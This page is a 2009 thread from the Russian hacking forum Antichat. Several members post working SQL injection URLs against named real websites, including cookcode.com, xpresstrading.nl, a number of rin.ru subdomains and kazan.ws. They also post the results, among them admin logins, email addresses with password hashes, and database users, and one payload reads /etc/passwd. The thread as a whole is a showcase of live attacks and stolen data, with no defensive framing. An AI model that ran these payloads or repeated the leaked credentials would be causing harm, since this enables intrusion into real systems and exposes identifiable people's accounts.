ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7601  
Старый 02.02.2009, 01:23
Аватар для Assembler
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

Еще один -)
Код:
http://collectorsassemble.com/key.php?page_id=-1%20union%20select%20concat(owner_id,0x3a,owner,0x3a,owner_full,0x3a,username,0x3a,password),2,3%20from%20owner%20limit%201,1--
Хрен поймешь куда эти логины и пароли, рега без паса в таблице customer вроде..
 
Ответить с цитированием

  #7602  
Старый 02.02.2009, 02:30
Аватар для recfrf
recfrf
Новичок
Регистрация: 22.08.2008
Сообщений: 10
Провел на форуме:
149978

Репутация: 6
По умолчанию

pr6
Код:
http://www.devicelink.com/products/prods.php?ProdsID=-1561+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
4.0.23-standard-log
 
Ответить с цитированием

  #7603  
Старый 02.02.2009, 03:33
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Программистам


Software Programming Components Warehouse !

Цитата:
http://www.cookcode.com/product_detail.php?product_id=5798765476+union+sel ect+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(), user(),database()),12,13,14,15,16,17,18,19,20,21,2 2--

Database Version: 5.0.67-community-log
Database name: sharewar_cookcode
User name: sharewar_june@localhost

Ишем админов вендоров селлеров


Цитата:
http://www.cookcode.com/product_detail.php?product_id=5798765476+UNION+SEL ECT+1,2,3,4,5,6,7,8,9,10,AES_DECRYPT(AES_ENCRYPT(C ONCAT(0x3a,(SELECT+CONCAT(isadmin,0x3a,isvendor,0x 3a,isreseller,0x3a,email,0x3a,password)+FROM+share war_cookcode.users+LIMIT+0,1),0x3a),0x71),0x71),12 ,13,14,15,16,17,18,19,20,21,22--


Fields isadmin:isvendor:isreseller:emailassword



1:1:1:webmaster@cookcode.com : d4524322453ffdc5a5b9be7197d20bb3
0:1:0:support@codeidea.com : ec72e3ac7a2bd7952620d8bbc44da693
0:1:0:sales@asptodll.com : 0c8054c65786089a9f58e97d26c60272
0:1:0:sales@mediadmin.com : be5d7fad6cb22911f7dacb0e1a82a827
0:1:0:e5988e@yahoo.com : 4c4e7fa2e7efff845aae5009d51adb6f
0:0:0:ulissespsm@hotmail.com : d93a5def7511da3d0f2d171d9c344e91
 
Ответить с цитированием

  #7604  
Старый 02.02.2009, 11:12
Аватар для Assembler
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

Код:
http://www.xpresstrading.nl/verkoop/productdetail.php?product_id=168&category_id=-34%20union%20select%201,2,concat_ws(0x3a,admin_id,admin_login,admin_pass,admin_email),4%20from%20admin--
admin_id,admin_login,admin_pass,admin_email
2:admin:rob:test@webciters.com
 
Ответить с цитированием

  #7605  
Старый 02.02.2009, 11:26
Аватар для pinky07
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715

Репутация: 90
Отправить сообщение для pinky07 с помощью ICQ
По умолчанию

Вот вчера ночью совершил набеги на сайты rin.ru

Цитата:
http://news.rin.ru/photojur/-190086'+union+select+1,concat_ws(0x3a,user(),datab ase(),version())+--+/1/1/
юзер - postcards@192.168.1.233
бд - news
версия mysql - 4.1.20

Цитата:
http://persona.rin.ru/view/fall/0/-37185+union+select+1,concat_ws(0x3a,version(),data base(),user()),3,4,5/biljaletdinov-dinijar
юзер - postcards@192.168.1.234
бд - persona
версия mysql - 4.1.20


Цитата:
http://tests.rin.ru/cgi-bin/test.cgi?N=0&test=-544'+union+select+concat_ws(0x3a,version(),user(), database()),2,3,4,5,6+--+
юзер - postcards@192.168.1.13
бд - tests
версия mysql - 4.1.22-log


Цитата:
http://map.rin.ru/cgi-bin/main.pl?Region=-adig'+union+select+1,2,3,4,concat_ws(0x3a,database (),user(),version()),6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24+--+
юзер - postcards@192.168.1.13
бд - map
версия mysql - 4.1.22-log


Цитата:
http://lib.rin.ru/cgi-bin/new.pl?art=-2854'+union+select+concat_ws(0x3a,database(),user( ),version()),2,3--+
юзер - postcards@192.168.1.13
бд - lib
версия mysql - 4.1.22-log


Цитата:
http://zakon.rin.ru/cgi-bin/view.pl?id=-722+union+select+concat_ws(0x3a,user(),database(), version())+--+&midr=721
юзер - postcards@192.168.1.13
бд - zakon
версия mysql - 4.1.20


Цитата:
http://wallpapers.rin.ru/cgi-bin/screen.pl?id=-33'+union+select+concat_ws(0x3a,user(),database(), version()),2,3,4,5,6+--+
юзер - postcards@192.168.1.233
бд - wallpapers
версия mysql - 4.1.20


Цитата:
http://topgun.rin.ru/cgi-bin/trash.pl?mode=show&unit=-10858+union+select+1,concat_ws(0x3a,user(),databas e(),version()),3,4,5+--+
user - postcards@192.168.1.13
бд - topgun
версия mysql - 4.1.22-log


Цитата:
http://russians.rin.ru/cgi-bin/rus/view.pl?a=fa&id=999994343+union+select+1,2,concat_ ws(0x3a,user(),database(),version()),4,5,6,7,8,9,1 0,11+--+&idr=409&n=
юзер - postcards@192.168.1.13
бд - russians1
версия mysql - 4.1.22-log
 
Ответить с цитированием

  #7606  
Старый 02.02.2009, 11:53
Аватар для Assembler
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

Код:
http://www.discoverytravel.ru/next.php?pid=-1337  union select table_name  from information_schema.columns where table_name --
Код:
http://www.sport-gym.ru/next.php?pid=-3%20union%20select%20group_concat(table_name),2%20from%20information_schema.tables--

Последний раз редактировалось jokester; 02.02.2009 в 12:21.. Причина: oqbo.ru БОЯН
 
Ответить с цитированием

  #7607  
Старый 02.02.2009, 12:13
Аватар для pinky07
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715

Репутация: 90
Отправить сообщение для pinky07 с помощью ICQ
По умолчанию

Код:
http://kazan.ws/cgi-bin/people/print.pl?action=sub&id_sub=-67+union+select+1,2,3,4,concat_ws(0x26,user(),database(),version(),LOAD_FILE('/etc/passwd')),6,7,8,9,10,11,12,13,14--&id_razdel=7&wh=razd

Последний раз редактировалось jokester; 02.02.2009 в 12:32.. Причина: orda-clan.ru БОЯН
 
Ответить с цитированием

  #7608  
Старый 02.02.2009, 14:05
Аватар для Assembler
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

Код:
http://elv.ee/next.php?lang=2&id=-5%20union%20select%201,version(),3,4,5,6%20--
Код:
http://www.volier.ru/l2.php?n=-1%20union%20select%201,2,version(),4--
 
Ответить с цитированием

  #7609  
Старый 02.02.2009, 14:25
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.hotel-cota1400.ro/render.php?page=100'+UNION+SELECT+AES_DECRYPT(AES_ ENCRYPT(CONCAT(Version(),Database(),User()),0x71), 0x71),2,3,4,5,6,7/*

Version: 4.1.22-standard-log
Databse: hotelco_public
User: hotelco_cota1400@localhost
 
Ответить с цитированием

  #7610  
Старый 02.02.2009, 14:27
Аватар для NigHT_0WL
NigHT_0WL
Познающий
Регистрация: 28.01.2009
Сообщений: 43
Провел на форуме:
170970

Репутация: 13
По умолчанию

Код:
http://elv.ee/next.php?lang=2&id=-5%20union%20select%201,version(),3,4,5,6%20--
user: d7775sa9187
host: z132.zone.ee
version: 5.0.67-log
db: d7775sd5376


Код:
http://www.volier.ru/l2.php?n=-1%20union%20select%201,2,version(),4--
vesion: 4.1.20
user:volierru@localhost
db:volierru
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ